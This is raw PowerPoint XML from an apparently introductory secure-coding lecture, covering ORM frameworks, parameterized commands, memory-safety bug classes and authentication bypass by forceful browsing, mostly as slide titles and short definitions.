        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="452836"/>
            <a:ext cx="12192000" cy="5814541"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA9C2BAB-CF85-B742-AAAB-9EAE98BF93E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3299304" y="4348011"/>
            <a:ext cx="495300" cy="24130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617345"/>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06346"/>
            <a:ext cx="12192000" cy="325925"/>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0A0EC48-B0EE-1F47-9E4C-7BFF853357F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2710059" y="5285773"/>
            <a:ext cx="495300" cy="241300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8C1B088-ED4A-6E4E-BC20-3A9BABE8CA3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2576448" y="5336399"/>
            <a:ext cx="152400" cy="165100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97D74A43-F102-D94C-ABC8-C7329B835456}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3782078" y="4398637"/>
            <a:ext cx="152400" cy="165100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2215801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p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3214443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E5E3-1EF3-F84E-902E-4386476B8B3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="546537" y="365125"/>
            <a:ext cx="11140965" cy="1325563"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>ORM Frameworks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D959C473-2048-1B42-9056-807F549184D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="546537" y="1825625"/>
            <a:ext cx="11140965" cy="4774872"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>ORM = Object Relational Mapping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>ORM Frameworks keep developers away from SQL Queries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Popular ORM Framework: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Hibernate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Table 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3581DDA-3041-F84D-AAC8-692B14B22FB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1842506316"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4614486" y="3759034"/>
          <a:ext cx="3831173" cy="2144111"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:effectLst/>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2089445">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1410839684"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1741728">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1305350556"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="567069">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Bradley Hand" pitchFamily="2" charset="77"/>
                        </a:rPr>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u="sng" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Bradley Hand" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>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788521">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Bradley Hand" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>Parameter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788521">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Bradley Hand" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>Parameter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5" name="Curved Connector 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8B53E11-CC4F-494E-B5EC-4FA6305D8218}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8622638" y="4672985"/>
            <a:ext cx="532821"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62BDC240-2793-8440-BBCB-E613FC733024}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1235947026"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="9197500" y="3738511"/>
          <a:ext cx="2202068" cy="2227198"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:effectLst/>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2202068">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1410839684"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="2227198">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Bradley Hand" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>Command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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Table 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FADBFA9C-BCF1-A141-8DB8-B93BCC605BCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2331109450"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="838200" y="3738511"/>
          <a:ext cx="2808890" cy="2144111"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:effectLst/>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1243029">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1410839684"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1565861">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1305350556"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="567069">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Bradley Hand" pitchFamily="2" charset="77"/>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2800" b="1" u="sng" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Bradley Hand" pitchFamily="2" charset="77"/>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156418"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="788521">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Bradley Hand" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>Field1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019355"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="788521">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Bradley Hand" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>Field2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1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Bradley Hand" pitchFamily="2" charset="77"/>
                        </a:rPr>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663150"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Curved Connector 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A16A068-0F65-E94D-AFD4-9016F6843F81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3866110" y="4646148"/>
            <a:ext cx="532821" cy="12700"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="53975">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:alpha val="99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771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35062"/>
            <a:ext cx="10931434" cy="4609579"/>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Parameterized Commands </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>handle situations where hazardous chars are needed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ORM Frameworks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>prevent mistakes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4012660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926E-F4BC-6241-A58D-FB549544A082}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="45000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Problems with Memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B519F5D9-D58F-1848-A1E8-7C577031685F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="45000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Classic Overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Incorrect Calculation of Buffer Size</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Off by One</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Format String Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Use-after-free</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="320679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56990" y="704966"/>
            <a:ext cx="10515600" cy="549275"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authentication Bypass</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BB19F13-0915-7446-9028-EC431BE4CA7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1398878" y="1408656"/>
            <a:ext cx="3480813" cy="3564836"/>
            <a:chOff x="1398878" y="1408656"/>
            <a:chExt cx="3480813" cy="3564836"/>
          </a:xfrm>
        </p:grpSpPr>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3391047" y="1408656"/>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squar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3249244" y="2226979"/>
              <a:ext cx="1173655" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>/restricted</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3768" y="3613109"/>
              <a:ext cx="952500" cy="952500"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="24" name="Group 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0143C41B-0369-DF42-8D23-CD96297C5EB6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1398878" y="3469666"/>
              <a:ext cx="1467068" cy="1503826"/>
              <a:chOff x="1345136" y="3444526"/>
              <a:chExt cx="1467068" cy="1503826"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="18" name="Graphic 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E9B8A2A-1A9D-7742-A5FF-32C355FA5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136" y="3444526"/>
                <a:ext cx="952500" cy="952500"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="19" name="Graphic 18">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93270576-9AC6-5147-9955-7029A4B4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0575" y="3627856"/>
                <a:ext cx="952500" cy="952500"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="20" name="TextBox 19">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BC41E3C-7C7A-034A-8B7E-41549B3D4C3C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1345136" y="4579020"/>
                <a:ext cx="1467068" cy="369332"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t>Regular Users</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="TextBox 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84BBC84B-9A44-AD43-915F-EA2939C046D3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3384278" y="4551251"/>
              <a:ext cx="960391" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="squar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8" idx="0"/>
              <a:endCxn id="8" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipV="1">
              <a:off x="1443071" y="3037608"/>
              <a:ext cx="862749" cy="1367"/>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5" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000" flipH="1" flipV="1">
              <a:off x="2264842" y="1480713"/>
              <a:ext cx="735123" cy="1517286"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector4">
              <a:avLst>
                <a:gd name="adj1" fmla="val -31097"/>
                <a:gd name="adj2" fmla="val 62076"/>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17" idx="0"/>
              <a:endCxn id="9" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipV="1">
              <a:off x="3329646" y="3102737"/>
              <a:ext cx="1016798" cy="3946"/>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3836072" y="3032514"/>
              <a:ext cx="1043619" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>Forceful </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>Browsing</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F34450E0-B6BF-A34A-87C8-8AEFD254BD08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6611112" y="1374967"/>
            <a:ext cx="4596731" cy="2246769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="2800" dirty="0"/>
              <a:t>Authentication Bypass occurs when the application does not prevent unknown users from accessing restricted functionality.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="116052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Memory Safe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>r</a:t>
